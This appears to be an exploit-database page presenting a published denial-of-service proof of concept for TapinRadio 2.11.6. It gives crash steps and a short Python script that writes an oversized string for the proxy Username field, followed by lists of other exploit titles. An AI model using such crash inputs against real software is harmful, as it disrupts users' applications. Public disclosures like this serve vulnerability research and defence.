Search for hundreds of thousands of exploits

"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)"

Author

Exploit author

"Victor Mondragón"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-05-22

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#Exploit Title: TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-21
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
#Tested Version: 2.11.6
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: tapinadio_user.py
#2.- Open tapin_user.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Username" field paste Clipboard
#6.- In Server type "1.1.1.1" > Port type 444  > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 10000
	
f = open('tapin_user.txt', 'w')
f.write(cod)
f.close()
Release DateTitleTypePlatformAuthor
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
2020-05-27"osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"OXID eShop 6.3.4 - 'sorting' SQL Injection"webappsphpVulnSpy
Release DateTitleTypePlatformAuthor
2020-05-26"StreamRipper32 2.6 - Buffer Overflow (PoC)"localwindows"Andy Bowden"
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-25"GoldWave - Buffer Overflow (SEH Unicode)"localwindows"Andy Bowden"
2020-05-22"Filetto 1.0 - 'FEAT' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)"localwindowsGobinathan
2020-05-22"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-22"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation"localwindows"Matteo Malvica"
2020-05-22"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)"doswindowsSocket_0x03
2020-05-21"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)"localwindows"Xenofon Vassilakopoulos"
2020-05-21"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)"doswindows"Xenofon Vassilakopoulos"
Release DateTitleTypePlatformAuthor
2019-05-24"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-24"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-22"RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'URL' Denial of Service (PoC)"dosmultiple"Victor Mondragón"
2019-05-21"Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-20"BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"Axessh 4.2 - 'Log file name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal v7.23.4 - 'Shell' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-16"ZOC Terminal 7.23.4 - 'Script' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"SpotMSN 2.4.6 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-13"DNSS 2.1.8 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"PHPRunner 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"ASPRunner.NET 10.1 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-10"jetCast Server 2.0 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-05-08"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-30"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-26"NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"Backup Key Recovery 2.2.4 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-25"HeidiSQL 10.1.0.5464 - Denial of Service (PoC)"doswindows"Victor Mondragón"
2019-04-17"DHCP Server 2.5.2 - Denial of Service (PoC)"doswindows"Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46902/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.